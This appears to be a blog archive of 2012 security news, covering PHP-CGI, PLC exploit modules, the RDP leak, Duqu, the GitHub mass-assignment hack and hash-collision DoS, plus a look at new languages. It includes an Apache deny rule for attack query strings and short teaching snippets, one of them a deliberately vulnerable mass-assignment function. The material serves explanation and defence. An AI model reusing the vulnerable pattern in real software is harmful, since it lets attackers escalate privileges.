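# no "=" anywhere, but a "-" (literal or URL-encoded as %2d) present.
RewriteCond %{QUERY_STRING} ^[^=]*$
RewriteCond %{QUERY_STRING} %2d|\- [NC]
RewriteRule .? - [F,L]
```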

HD Moore, the CSO of Rapid7 and the Metasploit chief architect who wrote the PHP-CGI module, agreed with Patrick that the percentage of sites vulnerable to the bug is probably small. But he went on to say that the installed base of PHP is so big, and the potential damage to those who are susceptible so large, that admins should take steps to lock down their systems right away. He also said attacks are likely to continue for months or years because of the difficulty many administrators have in updating.

“I wouldn’t be surprised if we continue to see this bug exploited in the wild for two or three years, because it will take a while for people to patch their systems,” he told Ars. “There are a lot of crusty old boxes out there running old versions of PHP, and if those are configured as CGI it’s going to affect them.”


Researchers release new exploits to hijack critical infrastructure

Friday, April 6th, 2012

Researchers have released two new exploits that attack common design vulnerabilities in a computer component used to control critical infrastructure, such as refineries and factories.

The exploits would allow someone to hack the system in a manner similar to how the Stuxnet worm attacked nuclear centrifuges in Iran, a hack that stunned the security world with its sophistication and ability to use digital code to create damage in the physical world.

The exploits attack the Modicon Quantum programmable logic controller made by Schneider-Electric, which is a key component used to control functions in critical infrastructures around the world, including manufacturing facilities, water and wastewater management plants, oil and gas refineries and pipelines, and chemical production plants. The Schneider PLC is an expensive system that costs about $10,000.

One of the exploits allows an attacker to simply send a “stop” command to the PLC.

The other exploit replaces the ladder logic in a Modicon Quantum PLC so that an attacker can take control of the PLC.

The module first downloads the current ladder logic on the PLC so that the attacker can understand what the PLC is doing. It then uploads a substitute ladder logic to the PLC, which automatically overwrites the ladder logic on the PLC. The module in this case only overwrites the legitimate ladder logic with blank ladder logic, to provide a proof of concept demonstration of how an attacker could easily replace the legitimate ladder logic with malicious commands without actually sabotaging the device.

The exploits take advantage of the fact that the Modicon Quantum PLC doesn’t require a computer that is communicating with it to authenticate itself or any commands it sends to the PLC—essentially trusting any computer that can talk to the PLC. Without such protection, an unauthorized party with network access can send the device malicious commands to seize control of it, or simply send a “stop” command to halt the system from operating.

The attack code was created by Reid Wightman, an ICS security researcher with Digital Bond, a computer security consultancy that specializes in the security of industrial control systems. The company said it released the exploits to demonstrate to owners and operators of critical infrastructures that “they need to demand secure PLC’s from vendors and develop a near-term plan to upgrade or replace their PLCs.”

The exploits were released as modules in Metasploit, a penetration testing tool owned by Rapid7 that is used by computer security professionals to quickly and easily test their networks for specific security holes that could leave them vulnerable to attack.

The exploits were designed to demonstrate the “ease of compromise and potential catastrophic impact” of vulnerabilities and make it possible for owners and operators of critical infrastructure to “see and know beyond any doubt the fragility and insecurity of these devices,” said Digital Bond CEO Dale Peterson in a statement.

But Metasploit is also used by hackers to quickly find and gain access to vulnerable systems. Peterson has defended his company’s release of exploits in the past as a means of pressuring companies like Schneider into fixing serious design flaws and vulnerabilities they’ve long known about and neglected to address.

Peterson and other security researchers have been warning for years that industrial control systems contain security issues that make them vulnerable to hacking. But it wasn’t until the Stuxnet worm hit Iran’s nuclear facilities in 2010 that industrial control systems got widespread attention. The makers of PLCs, however, have still taken few steps to secure their systems.

“[M]ore than 500 days after Stuxnet the Siemens S7 has not been fixed, and Schneider and many other ICS vendors have ignored the issues as well,” Peterson said.

Stuxnet, which attacked a PLC model made by Siemens in order to sabotage centrifuges used in Iran’s uranium enrichment program, exploited the fact that the Siemens PLC, like the Schneider PLC, does not require any authentication to upload rogue ladder logic to it, making it easy for the attackers to inject their malicious code into the system.

Peterson launched a research project last year dubbed Project Basecamp, to uncover security vulnerabilities in widely used PLCs made by multiple manufacturers.

In January, the team disclosed several vulnerabilities they found in the Modicon Quantum system, including the lack of authentication and the presence of about 12 backdoor accounts that were hard-coded into the system with read/write capability. The system also has a web server password that is stored in plaintext and is retrievable via an FTP backdoor.

At the time of its January announcement, the group released exploit modules attacking vulnerabilities in some of the other products it examined, and it has gradually been releasing exploits for additional products since then.


Is application security the glaring hole in your defense?

Tuesday, March 27th, 2012

When it comes to security, a large number of organizations have a glaring hole in their defenses: their applications.

A recent study of more than 800 IT security and development professionals reports that most organizations don’t treat application security as a priority discipline, despite the fact that SQL injection attacks are the leading root cause of data breaches. The second-leading root cause is exploitation of vulnerable code in Web 2.0/social media applications.

Sixty-eight percent of developers’ organizations and 47 percent of security practitioners’ organizations suffered one or more data breaches in the past 24 months due to hacked or compromised applications. A further 19 percent of security practitioners and 16 percent of developers were uncertain if their organization had suffered a data breach due to a compromised or hacked application. Additionally, only 12 percent of security practitioners and 11 percent of developers say all their organizations’ applications meet regulations for privacy, data protection and information security.

Despite the data breaches resulting from hacked or compromised applications and the lack of compliance with regulations, 38 percent of security practitioners and 39 percent of developers say less than 10 percent of the IT security budget is dedicated to application security.

“We set out to measure the tolerance to risk across the established phases of application security, and define what works and what hasn’t worked, how industries are organizing themselves and what gaps exist,” says Dr. Larry Ponemon, CEO of the Ponemon Institute, the research firm that conducted the study on behalf of security firm Security Innovation. “We accomplished that, but what we also found was a drastic divide between the IT security and development organizations that is caused by a major skills shortage and a fundamental misunderstanding of how an application security process should be developed. This lack of alignment seems to hurt their business based on not prioritizing secure software, but also not understanding what to do about it.”

The study found that security practitioners and developers were far apart in their perception of the issue. While one might expect that security practitioners held the more cynical views with regard to application security, in fact the opposite was true. Dr. Ponemon says 71 percent of developers say application security was not adequately emphasized during the application development lifecycle, compared with 49 percent of security practitioners who felt the same way. Additionally, 46 percent of developers say their organization had no process for ensuring security is built into new applications, while only 21 percent of security practitioners believed that to be the case.

Developers and security practitioners are also divided on the issue of remediating vulnerable code. Nearly half (47 percent) of developers say their organization has no formal mandate to remediate vulnerable code, while 29 percent of security practitioners say the same.

“What emerged in this study was that companies don’t seem to be looking at the root causes of data breaches, and they aren’t moving very fast to bridge the existing gaps to fix the myriad of problems,” says Ed Adams, CEO of Security Innovation. “The threat landscape has grown substantially in scope, most notably as our survey respondents stated that Web 2.0 and mobile attacks are the targets of the next wave of threats beyond just web applications.”

The survey also found that nearly half of developers say there is no collaboration between their development organization and the security organization when it comes to application security. That’s a stark contrast from the 19 percent of security practitioners that say there is no collaboration.

Lack of Collaboration in Application Security

“We basically found that developers were much more likely to think there was a lack of collaboration,” Dr. Ponemon says. “The security folks, on the whole, thought the collaboration was OK. I think that one of the biggest problems is that the security folks think they’re getting the word out on collaborating or helping, but they’re not doing so effectively.”

In other words, Dr. Ponemon says, the security organization writes its security policy and gives it to developers, but the developers, by and large, don’t understand how to implement that policy. The security organizations think they’ve done their job, but they haven’t managed to make their policy contextual for developers.

“We find that process has no bearing whatsoever on the ability of an organization to write secure code,” Dr. Ponemon says. “It doesn’t take any longer to write a line of secure code than it does to write a line of insecure code. You just have to know which one to write.”

Education Is Key to Application Security

But knowing which line of code to write seems to be a large part of the problem. The study found that only 22 percent of security practitioners and 11 percent of developers say their organization has a fully deployed application security training program. Fully 36 percent of security practitioners and 37 percent of developers say their organization had no application security training program and no plans to deploy one.

Adams believes providing that education will go a long way toward helping organizations secure their applications and minimize the risk.

“This is more of an education problem than anything else,” Adams says. “In the late 90s, everybody was putting their applications on the web. But they kept on crashing. It was really a performance problem: The developers didn’t know how to code for performance. Amazingly, that’s what’s happening in the world today. Organizations are buying application security tools before they get application security training. You have to get trained on the technique first.”


Open source code libraries seen as rife with vulnerabilities

Tuesday, March 27th, 2012

Google Web Toolkit, Apache Xerces among most downloaded vulnerable libraries, study says

A study of how 31 popular open-source code libraries were downloaded over the past 12 months found that more than a third of the 1,261 versions of these libraries had a known vulnerability and about a quarter of the downloads were tainted.

The study was undertaken by Aspect Security, which evaluates software for vulnerabilities, with Sonatype, a firm that provides a Central Repository housing more than 300,000 libraries for downloading open-source components and gets 4 billion requests per year.

“Increasingly over the past few years, applications are being constructed out of libraries,” says Jeff Williams, CEO of Aspect Security, referring to “The Unfortunate Reality of Insecure Libraries” study. Open-source communities have done little to provide a clear way to spotlight code found to have vulnerabilities or identify how to remedy it when a fix is even made available, he says.

“There’s no notification infrastructure at all,” says Williams. “We want to shed light on this problem.”

He adds that Aspect and Sonatype are mulling how it might be possible to improve the situation overall.

According to the study, researchers at Aspect analyzed 113 million software downloads made over 12 months from the Central Repository, covering 31 popular Java frameworks and security libraries (Aspect says one basis for selecting the libraries was their use by its customers). Researchers found:

– 19.8 million (26%) of the library downloads have known vulnerabilities.

– The most downloaded vulnerable libraries were Google Web Toolkit (GWT); Apache Xerces; Spring MVC; and Struts 1.x. (The other libraries examined were: Apache CXF; Hibernate; Java Servlet; Log4j; Apache Velocity; Spring Security; Apache Axis; BouncyCastle; Apache Commons; Tiles; Struts2; Wicket; Java Server Pages; Lift; Hibernate Validator; Java Server Faces; Tapestry; Apache Santuario; JAX-WS; Grails; Jasypt; Apache Shiro; Stripes; AntiSamy; ESAPI; HDIV and JBoss Seam.)

Security libraries are slightly more likely to have a known vulnerability than frameworks, the study says. “Today’s applications commonly use 30 or more libraries, which can comprise up to 80% of the code in an application,” according to the study.

The types of vulnerabilities found in open source code libraries vary widely.

“While some vulnerabilities allow the complete takeover of the host using them, others might result in data loss or corruption, and still others might provide a bit of useful information to attackers,” the study says. “In most cases, the impact of a vulnerability depends greatly on how the library is used by the application.”

The study noted some known well-publicized vulnerabilities.

– Spring, the popular application development framework for Java, was downloaded more than 18 million times by over 43,000 organizations in the last year. However, a discovery last year showed a new class of vulnerabilities in Spring’s use of Expression Language that could be exploited through HTTP parameter submissions that would allow attackers to get sensitive system data, application and user cookies.

– In 2010, Google’s research team discovered a weakness in Struts2 that allowed attackers to execute arbitrary code on any Struts2 Web application.

– In Apache CXF, a framework for Web services that was downloaded 4.2 million times by more than 16,000 organizations in the last 12 months, two major vulnerabilities have been discovered since 2010 (CVE-2010-2076 and CVE-2012-0803) that allowed attackers to trick any service using CXF into disclosing arbitrary system files and to bypass authentication.

Vulnerabilities are discovered by researchers, who disclose them as they choose; some disclosures are coordinated, while “others simply write blog posts or emails in mailing lists,” the study notes. “Currently, developers have no way to know that the library versions they are using have known vulnerabilities. They would have to monitor dozens of mailing lists, blogs, and forums to stay abreast of information. Further, development teams are unlikely to find their own vulnerabilities, as it requires extensive security experience and automated tools are largely ineffective at analyzing libraries.”

Although some open source groups, such as OpenBSD, are “quite good” in how they manage vulnerability disclosures, says Williams, the vast majority handle these kinds of security issues in haphazard fashion and with uncertain disclosure methods. Organizations should strengthen their security processes and OpenBSD can be considered an encouraging model in that respect, the study says.

Williams adds that use of open source libraries also raises the question of “dependency management.” This is the security process that developers would use to identify what libraries their project really directly depends on. Often, developers end up using code that goes beyond the functionality that’s really needed, using libraries that may also be dependent on other libraries. This sweeps in a lot of out-of-date code that brings risk and no added value, but swells the application in size. “Find out what libraries you’re using and which are out of date,” says Williams. “We suggest minimizing the use of libraries.”
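The first step of that advice, knowing what you actually depend on, can start as simply as listing the coordinates declared in a build file. As a rough illustration (a naive string scan, not a real dependency resolver, and the pom snippet below is made up), a few lines of JavaScript suffice:

```javascript
// Naive sketch: list groupId:artifactId:version coordinates declared in a
// pom.xml string so they can be checked against vulnerability announcements.
// A real inventory must also include the full transitive dependency tree.
var pom = [
  '<dependencies>',
  '  <dependency>',
  '    <groupId>org.apache.struts</groupId>',
  '    <artifactId>struts2-core</artifactId>',
  '    <version>2.1.8</version>',
  '  </dependency>',
  '</dependencies>'
].join('\n');

function declaredDependencies(pomXml) {
  var deps = [];
  var re = /<dependency>([\s\S]*?)<\/dependency>/g;
  var match;
  while ((match = re.exec(pomXml)) !== null) {
    var block = match[1];
    // Pull a single child element's text out of the <dependency> block.
    var pick = function (tag) {
      var t = block.match(new RegExp('<' + tag + '>([^<]*)</' + tag + '>'));
      return t ? t[1] : '?';
    };
    deps.push(pick('groupId') + ':' + pick('artifactId') + ':' + pick('version'));
  }
  return deps;
}

console.log(declaredDependencies(pom)); // [ 'org.apache.struts:struts2-core:2.1.8' ]
```

Each coordinate in the resulting list is something a team can check, by hand or with tooling, against the announcements the study says developers currently have to hunt down across mailing lists and blogs.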

The report points out, “While organizations typically have strong patch management processes for software products, open source libraries are typically not part of these processes. In virtually all development organizations, updates to libraries are handled on an ad hoc basis, by development teams.”


Suspicions aroused as exploit for critical Windows bug is leaked

Sunday, March 18th, 2012

Attack code privately submitted to Microsoft to demonstrate the severity of a critical Windows vulnerability is circulating on the ‘Net, prompting the researcher who discovered it to say it was leaked by the software maker or one of its trusted partners.

The precompiled executable surfaced on Chinese-language websites on Thursday, two days after Microsoft released a patch for the hole, which affects all supported versions of the Windows operating system. The company warned users to install the fix as soon as possible because the vulnerability allows attackers to hit high-value targets with self-replicating exploits that remotely install malicious software. Microsoft security personnel have predicted exploit code will be independently developed within the next month.

Luigi Auriemma, the Italian security researcher who discovered the vulnerability and submitted proof-of-concept code to Microsoft and one of its partners in November, wrote in an email that he’s “100% sure” the rdpclient.exe binary was taken from the exploit he wrote. In a later blog post, he said evidence his code was copied included an internal tracking number the Microsoft Security Response Center assigned to the vulnerability. He also cited other striking similarities in the packet that triggers the vulnerability.

“So yes, the pre-built packet stored in ‘rdpclient.exe’ IS mine,” he wrote. “No doubts.”

He went on to speculate that the code was leaked by someone from Microsoft or one of its trusted partners. He specifically named ZDI, or the Zero Day Initiative, which is a program sponsored by HP-owned Tipping Point, a maker of intrusion prevention systems that pays researchers cash for technical details about critical software vulnerabilities. He also speculated the leak could have come from any one of the 30 or so partners who participate in the Microsoft Active Protections Program. The program gives antivirus and IPS makers technical details of Microsoft vulnerabilities in advance so they can release signatures that prevent them from being exploited.

Update: Aaron Portnoy, ZDI’s Manager of Security Research, told Ars he’s sure the leak didn’t come from anyone at his company.

“I’ve actually gotten confirmation from Microsoft that they are also confident that the leak wasn’t from us,” he said in an interview. “I can’t comment further on the issue other than [to say] they seem to have some knowledge as to what happened and they are confident it was not from us.”

He said exploit details have never leaked out of his company, and he added he was unaware of leaks involving other Microsoft partners, either.

Update 2: Yunsun Wee, director of Microsoft’s Trustworthy Computing division, confirmed that the code appeared to match vulnerability information shared with MAPP partners.

“Microsoft is actively investigating the disclosure of these details and will take the necessary actions to protect customers and ensure that confidential information we share is protected pursuant to our contracts and program requirements,” Wee wrote in a blog post. The statement made no reference to Portnoy’s comments.

Developers of the Metasploit framework, an open-source package that hackers and penetration testers use to exploit known security bugs, have confirmed that rdpclient.exe triggers the vulnerability Microsoft reported Tuesday. The flaw resides in the Remote Desktop Protocol and allows attackers to execute code of their choosing on any machine that has RDP turned on. HD Moore, CSO of Rapid7 and chief architect of the Metasploit project, told Ars the code caused a machine running Windows Server 2008 R2 to display a blue screen of death, but there were no signs it executed any code.

He said Metasploit personnel have been able to replicate the crash, but are still several weeks away from being able to exploit the bug to execute code.

“It’s still a huge vector for knocking servers offline right now if you can figure out how to DOS the RDP service,” he said in an interview.

There are unconfirmed claims that code is already circulating in the wild that does far more than cause machines to crash. One screen shot, for example, purports to show a Windows machine receiving a remote payload after the vulnerability is exploited. Security consultants have said there’s no proof such attacks are real.

“On the other hand, if they’ve had this since November internally, it’s not impossible that someone would have had time to actually develop what that screen shot is showing,” Alex Ionescu, who is chief architect of security firm CrowdStrike, told Ars.


Duqu Trojan contains unknown programming language

Monday, March 12th, 2012

The Duqu trojan has researchers puzzled because it contains a programming language they’ve never seen before

In June 2010, the world became aware of Stuxnet, widely considered to be the most advanced and dangerous piece of malware ever created. But before you run to check that your antivirus software is up to date, note that Stuxnet, widely believed to be state-created, had one singular purpose: to cripple Iran’s ability to develop nuclear weapons.

When security researchers began studying Stuxnet more closely, they were astonished at its level of sophistication. Stuxnet’s ultimate aim, researchers found, was to target specialized Siemens industrial software and equipment employed in Iran’s nuclear research facilities. The original Stuxnet virus was able to deftly inject code into the Programmable Logic Controllers (PLCs) of the aforementioned Siemens industrial control systems.

The end result, according to foreign reports, is that Stuxnet was able to infiltrate an Iranian uranium enrichment facility and subsequently destroy over 1,000 centrifuges, in a manner subtle enough to avoid detection by Iranian nuclear scientists.

In the wake of Stuxnet, researchers weren’t shy about proclaiming that a new era of sophisticated malware was upon us.

This past September, a new variant of Stuxnet was discovered. It’s called Duqu and security experts believe it was developed in conjunction with Stuxnet by the same development team. After studying the software, security firm Symantec said that the Duqu virus was almost identical to Stuxnet, yet with a “completely different purpose.”

The reported goal of the Duqu virus wasn’t to sabotage but rather to acquire information.

A research report from Symantec this past October explained,

Duqu is essentially the precursor to a future Stuxnet-like attack. The threat was written by the same authors (or those that have access to the Stuxnet source code) and appears to have been created since the last Stuxnet file was recovered. Duqu’s purpose is to gather intelligence data and assets from entities, such as industrial control system manufacturers, in order to more easily conduct a future attack against another third party. The attackers are looking for information such as design documents that could help them mount a future attack on an industrial control facility.

And just when you thought the whole Stuxnet/Duqu trojan saga couldn’t get any crazier, a security firm that has been analyzing Duqu writes that it employs a programming language they’ve never seen before.

Security researchers at Kaspersky Lab found that the “payload DLL” of Duqu contains code written in an unrecognized programming language. While many parts of the Trojan are written in C++, other portions contain syntax that security researchers can’t match to any known programming language.

After analyzing the code, researchers at Kaspersky concluded the following:

  • The Duqu Framework appears to have been written in an unknown programming language.
  • Unlike the rest of the Duqu body, it’s not C++ and it’s not compiled with Microsoft’s Visual C++ 2008.
  • The highly event-driven architecture points to code designed to be used under pretty much any conditions, including asynchronous communications.
  • Given the size of the Duqu project, it is possible that a different team was responsible for the framework than the one that created the drivers and wrote the system infection code and exploits.
  • The mysterious programming language is definitely NOT C++, Objective-C, Java, Python, Ada, Lua, or any of the many other languages checked.
  • Compared to Stuxnet (written entirely in MSVC++), this is one of the defining particularities of the Duqu framework.
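
Kaspersky’s observation about a “highly event driven architecture” is worth unpacking. In such a design, components never call one another directly; they register callbacks and react to events posted to a queue, a structure that naturally accommodates asynchronous communications. The Python sketch below is purely illustrative, a minimal version of the pattern, and has no connection to Duqu’s actual code.

```python
import collections

class EventLoop:
    """A minimal event-driven dispatcher: handlers subscribe to event
    types, producers post events to a queue, and run() drains the queue,
    invoking each registered callback with the event's payload."""

    def __init__(self):
        self.handlers = collections.defaultdict(list)
        self.queue = collections.deque()

    def subscribe(self, event_type, callback):
        self.handlers[event_type].append(callback)

    def post(self, event_type, payload=None):
        # Producers don't call handlers directly; they just enqueue.
        self.queue.append((event_type, payload))

    def run(self):
        while self.queue:
            event_type, payload = self.queue.popleft()
            for callback in self.handlers[event_type]:
                callback(payload)

loop = EventLoop()
received = []
loop.subscribe("data", received.append)   # react to "data" events
loop.post("data", b"chunk-1")             # e.g. bytes arriving off the wire
loop.post("data", b"chunk-2")
loop.run()
assert received == [b"chunk-1", b"chunk-2"]
```

Because handlers are decoupled from producers, the same loop can service timers, network I/O, and command-and-control messages without any component knowing about the others, which is why this style of architecture fits "any kind of conditions."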

Consequently, Kaspersky decided to reach out to the programming community to help them figure out which programming language the Duqu Framework employs. As of Sunday evening, nothing conclusive had been found, but a comment on Kaspersky’s blog post might prove useful.

The code your referring to .. the unknown c++ looks like the older IBM compilers found in OS400 SYS38 and the oldest sys36.The C++ code was used to write the tcp/ip stack for the operating system and all of the communications. The protocols used were the following x.21(async) all modes, Sync SDLC, x.25 Vbiss5 10 15 and 25. CICS. RSR232. This was a very small and powerful communications framework. The IBM system 36 had only 300MB hard drive and one megabyte of memory,the operating system came on diskettes.This would be very useful in this virus. It can track and monitor all types of communications. It can connect to everything and anything.

While many other suggestions in the comment section were dismissed by Kaspersky Lab expert Igor Soumenkov, the one above netted a “Thank you!”

Another tip that Soumenkov seemed excited about identifies the unknown language as Simple Object Orientation (for C), but not without some reservations.

SOO may be the correct answer! But there are still two things to figure out:
1) When was SOO C created? I see Oct 2010 in git – that’s too late, Duqu was already out there.
2) If SOO is the toolkit, then event driven model was created by the authors of Duqu. Given the size of framework-based code, they should have spent 1+ year making all things work correctly.

It turns out that almost the same code can be produced by the MSVC compiler for a “hand-made” C class. This means that a custom OO C framework is the most probable answer to our question.
We kept this (OO C) version as a “worst-case” explanation – because that would mean that the amount of time and effort invested in development of the Framework is enormous compared to other languages/toolkits.

Note that work on Duqu, according to researchers, began sometime in 2007. And as for the enormous amount of work Soumenkov refers to, remember that most researchers believe Stuxnet and its brethren were created by state actors. Many believe Israel and the United States may have worked together on the project to stymie Iran’s nuclear weapons plans. Others believe Stuxnet may be the handiwork of China.


Hacker commandeers GitHub to prove Rails vulnerability

Tuesday, March 6th, 2012

A Russian hacker dramatically demonstrated one of the most common security weaknesses in the Ruby on Rails web application framework. By doing so, he took full control of the databases GitHub uses to distribute Linux and thousands of other open-source software packages.

Egor Homakov exploited what’s known as a mass assignment vulnerability in GitHub to gain administrator access to the Ruby on Rails repository hosted on the popular website. The weekend hack allowed him to post an entry in the framework’s bug tracker dated 1,001 years into the future. It also allowed him to gain write privileges to the code repository. He carried out the attack by replacing a cryptographic key of a known developer with one he created. While the hack was innocuous, it sparked alarm among open-source advocates because it could have been used to plant malicious code in repositories millions of people use to download trusted software.

Homakov launched the attack two days after he posted a vulnerability report to the Rails bug list warning that mass assignment in Rails made websites relying on the framework susceptible to compromise. A variety of developers replied with posts saying the vulnerability is already well known and that responsibility for preventing exploits rests with those who use the framework. Homakov responded by saying that even developers of large sites such as GitHub, Posterous, Speakerdeck, and Scribd were failing to adequately protect against the vulnerability.

In the following hours, participants in the online discussion continued to debate the issue. The mass assignment vulnerability is to Rails what SQL injection weaknesses are to other web applications. It’s a bug so common that many users have grown impatient with warnings about it. Maintainers of Rails have largely argued that individual developers should single out and “blacklist” attributes that are too security-sensitive to be externally modifiable. Others, such as Homakov, have said Rails maintainers should turn on whitelist protection by default. Currently, applications must explicitly enable such protections.
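
To make the debate concrete, here is a minimal sketch of the bug in Python rather than Ruby. The names `User`, `update_from_params`, and `ALLOWED` are invented for illustration; this shows the pattern, not Rails’ actual API. Mass assignment blindly copies every request parameter onto a model object, so a crafted request can set fields the form never exposed; a whitelist restores control.

```python
class User:
    """A toy model with one field the public form should never touch."""
    def __init__(self):
        self.name = ""
        self.email = ""
        self.is_admin = False

def update_from_params(user, params):
    # Vulnerable: trusts every key the client sent.
    for key, value in params.items():
        setattr(user, key, value)

ALLOWED = {"name", "email"}   # whitelist of externally writable fields

def update_from_params_safe(user, params):
    # Fixed: only whitelisted attributes may be mass-assigned.
    for key, value in params.items():
        if key in ALLOWED:
            setattr(user, key, value)

# A request body the attacker crafted by adding an extra field.
attacker_params = {"name": "Egor", "is_admin": True}

victim = User()
update_from_params(victim, attacker_params)
print(victim.is_admin)        # True -- privilege escalation

victim2 = User()
update_from_params_safe(victim2, attacker_params)
print(victim2.is_admin)       # False -- is_admin was filtered out
```

The blacklist-versus-whitelist argument is exactly the choice between enumerating the dangerous keys (and missing one) and enumerating the safe ones, with everything else rejected by default.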

A couple of days into the debate, Homakov responded by exploiting mass assignment bugs in GitHub to take control of the site. Less than an hour after discovering the attack, GitHub administrators deployed a fix for the underlying vulnerability and initiated an investigation to see whether other parts of the site suffered from similar weaknesses. The site also temporarily suspended Homakov, later reinstating him.

“Now that we’ve had a chance to review his activity, and have determined that no malicious intent was present, @homakov’s account has been reinstated,” a blog post published on Monday said. It went on to encourage developers to practice “responsible disclosure.”


Multiple Programming Language Implementations Vulnerable to Hash Table Collision Attacks

Tuesday, January 3rd, 2012

US-CERT is aware of reports stating that multiple programming language implementations, including web platforms, are vulnerable to hash table collision attacks. This vulnerability could be used by an attacker to launch a denial-of-service attack against websites using affected products.
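
The mechanics behind the advisory are easy to demonstrate. In a hash table that resolves collisions by chaining, keys that all land in the same bucket degrade O(1) operations to O(n), so n hostile inserts cost O(n²) work in total. The toy Python table below is illustrative only; real attacks precompute strings that collide under the target language’s actual string hash, which is why the fixes randomize it.

```python
class ChainedTable:
    """A toy hash table with separate chaining, to show how colliding
    keys concentrate all work in a single bucket."""

    def __init__(self, nbuckets=1024):
        self.nbuckets = nbuckets
        self.buckets = [[] for _ in range(nbuckets)]

    def insert(self, key, value):
        chain = self.buckets[hash(key) % self.nbuckets]
        for i, (k, _) in enumerate(chain):   # linear scan of the chain
            if k == key:
                chain[i] = (key, value)
                return
        chain.append((key, value))

n = 2000

# Benign workload: consecutive integer keys spread across buckets
# (Python hashes small ints to themselves, so placement is predictable).
benign = ChainedTable()
for k in range(n):
    benign.insert(k, None)
assert max(len(c) for c in benign.buckets) == 2   # short chains everywhere

# Hostile workload: every key is a multiple of the bucket count,
# so every insert lands in (and must scan) bucket 0.
hostile = ChainedTable()
for k in range(0, n * 1024, 1024):
    hostile.insert(k, None)
assert len(hostile.buckets[0]) == n               # one chain of length n
```

With string keys and a known, unseeded hash function, an attacker can send one POST request whose parameter names all collide, pinning a CPU for minutes; that is the denial of service US-CERT describes.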

The Ruby Security Team has updated Ruby 1.8.7. The Ruby 1.9 series is not affected by this attack. Additional information can be found in the Ruby 1.8.7 patchlevel 357 release notes.

Microsoft has released an update for the .NET Framework to address this vulnerability and three others. Additional information can be found in Microsoft Security Bulletin MS11-100 and Microsoft Security Advisory 2659883.

More information regarding this vulnerability can be found in US-CERT Vulnerability Note VU#903934 and n.runs Security Advisory n.runs-SA-2011.004.

US-CERT will provide additional information as it becomes available.

Source:  US-CERT

10 programming languages that could shake up IT

Tuesday, January 3rd, 2012

These cutting-edge programming languages provide unique insights on the future of software development

Do we really need another programming language? There is certainly no shortage of choices already. Between imperative languages, functional languages, object-oriented languages, dynamic languages, compiled languages, interpreted languages, and scripting languages, no developer could ever learn all of the options available today.

And yet, new languages emerge with surprising frequency. Some are designed by students or hobbyists as personal projects. Others are the products of large IT vendors. Even small and midsize companies are getting in on the action, creating languages to serve the needs of their industries. Why do people keep reinventing the wheel?

The answer is that, as powerful and versatile as the current crop of languages may be, no single syntax is ideally suited for every purpose. What’s more, programming itself is constantly evolving. The rise of multicore CPUs, cloud computing, mobility, and distributed architectures has created new challenges for developers. Adding support for the latest features, paradigms, and patterns to existing languages — especially popular ones — can be prohibitively difficult. Sometimes the best answer is to start from scratch.

Here, then, is a look at 10 cutting-edge programming languages, each of which approaches the art of software development from a fresh perspective, tackling a specific problem or a unique shortcoming of today’s more popular languages. Some are mature projects, while others are in the early stages of development. Some are likely to remain obscure, but any one of them could become the breakthrough tool that changes programming for years to come — at least, until the next batch of new languages arrives.

Experimental programming language No. 1: Dart
JavaScript is fine for adding basic interactivity to Web pages, but when your Web applications swell to thousands of lines of code, its weaknesses quickly become apparent. That’s why Google created Dart, a language it hopes will become the new vernacular of Web programming.

Like JavaScript, Dart uses C-like syntax and keywords. One significant difference, however, is that while JavaScript is a prototype-based language, objects in Dart are defined using classes and interfaces, as in C++ or Java. Dart also allows programmers to optionally declare variables with static types. The idea is that Dart should be as familiar, dynamic, and fluid as JavaScript, yet allow developers to write code that is faster, easier to maintain, and less susceptible to subtle bugs.
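
The prototype-versus-class distinction can be sketched outside either language. In the Python illustration below (the `Proto` class and `Greeter` are invented for this sketch, not anything from Dart or JavaScript), a prototype-style object delegates attribute lookups to another object at runtime, JavaScript-style, while a class-based object gets its structure from a declared class, as in Dart or Java.

```python
class Proto:
    """Prototype-style object: attributes live on the instance, and any
    lookup that misses locally is delegated to another object (the
    prototype) at runtime."""

    def __init__(self, proto=None, **slots):
        self._proto = proto
        self.__dict__.update(slots)

    def __getattr__(self, name):          # called only on a local miss
        if self._proto is not None:
            return getattr(self._proto, name)
        raise AttributeError(name)

base = Proto(greet=lambda: "hi")          # behavior attached to an object
child = Proto(proto=base)                 # inherits by delegation, no class
print(child.greet())                      # "hi" -- resolved via the prototype

class Greeter:
    """Class-based object: its shape and methods are declared up front,
    so tools (and optional static types) can check calls before runtime."""
    def greet(self):
        return "hi"

print(Greeter().greet())                  # "hi" -- resolved via the class
```

The trade-off Dart is making is visible even in this sketch: the prototype version is maximally flexible (any object can gain any attribute at any time), while the class version gives compilers and IDEs a fixed structure to reason about.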

You can’t do much with Dart today. It’s designed to run on either the client or the server (a la Node.js), but the only way to run client-side Dart code so far is to cross-compile it to JavaScript. Even then it doesn’t work with every browser. But because Dart is released under a BSD-style open source license, any vendor that buys Google’s vision is free to build the language into its products. Google only has an entire industry to convince.

Experimental programming language No. 2: Ceylon
Gavin King denies that Ceylon, the language he’s developing at Red Hat, is meant to be a “Java killer.” King is best known as the creator of the Hibernate object-relational mapping framework for Java. He likes Java, but he thinks it leaves lots of room for improvement.

Among King’s gripes are Java’s verbose syntax, its lack of first-class and higher-order functions, and its poor support for meta-programming. In particular, he’s frustrated with the absence of a declarative syntax for structured data definition, which he says leaves Java “joined at the hip to XML.” Ceylon aims to solve all these problems.

King and his team don’t plan to reinvent the wheel completely. There will be no Ceylon virtual machine; the Ceylon compiler will output Java bytecode that runs on the JVM. But Ceylon will be more than just a compiler, too. A big goal of the project is to create a new Ceylon SDK to replace the Java SDK, which King says is bloated and clumsy and has never been “properly modernized.”

That’s a tall order, and Red Hat has released no Ceylon tools yet. King says to expect a compiler this year. Just don’t expect software written in “100 percent pure Ceylon” any time soon.

Experimental programming language No. 3: Go
Interpreters, virtual machines, and managed code are all the rage these days. Do we really need another old-fashioned language that compiles to native binaries? A team of Google engineers — led by Robert Griesemer and Bell Labs legends Ken Thompson and Rob Pike — says yes.

Go is a general-purpose programming language suitable for everything from application development to systems programming. In that sense, it’s more like C or C++ than Java or C#. But like the latter languages, Go includes modern features such as garbage collection, runtime reflection, and support for concurrency.

Equally important, Go is meant to be easy to program in. Its basic syntax is C-like, but it eliminates redundant syntax and boilerplate while streamlining operations such as object definition. The Go team’s goal was to create a language that’s as pleasant to code in as a dynamic scripting language yet offers the power of a compiled language.

Go is still a work in progress, and the language specification may change. That said, you can start working with it today. Google has made tools and compilers available along with copious documentation; for example, the Effective Go tutorial is a good place to learn how Go differs from earlier languages.

Experimental programming language No. 4: F#
Functional programming has long been popular with computer scientists and academia, but pure functional languages like Lisp and Haskell are often considered unworkable for real-world software development. One common complaint is that functional-style code can be difficult to integrate with code and libraries written in imperative languages like C++ and Java.

